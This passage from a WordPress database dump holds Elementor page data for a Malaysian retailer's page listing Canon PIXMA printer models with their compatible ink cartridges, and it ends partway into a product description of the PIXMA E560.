width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP810<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP830<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP970<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP988<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP996<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d0130d\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fc01984\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6549880\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX308<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX328<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX338<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX347<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX366<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX426<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX876<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX886<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-726 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-725 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-1<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-29 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Dark Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Yellow)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b7fc065\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"387b65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-10<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-72 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-100<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-42 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TR8570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS207<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS307<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5070<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-771 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"736141f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e8521a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS8270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9170<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(6996,3313,'_wp_page_template','template-fullwidth.php'),(6997,3313,'_elementor_edit_mode','builder'),(6998,3313,'_elementor_template_type','post');
INSERT INTO `wpdp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES (6999,3313,'_elementor_data','[{\"id\":\"9ac79cf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2a109eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d59285\",\"elType\":\"widget\",\"settings\":{\"title\":\"Injet Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca9ead8\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"9a9d292\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"align\":\"center\"},\"elements\":[{\"id\":\"6ad8678\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E560 \\/ E560R\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70128a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\",\"id\":2345}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"509ac9b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Advanced Wireless All-In-One with Auto Duplex\\u00a0Printing for Low-Cost Printing<\\/p><p>The Ink Efficient E560 \\/ E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.<\\/p><p>Available in Black and Red.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO Standard print speed (A4): up to 9.9ipm black \\/ 5.7ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi<\\/p><p>Recommended print volume: 80 - 400 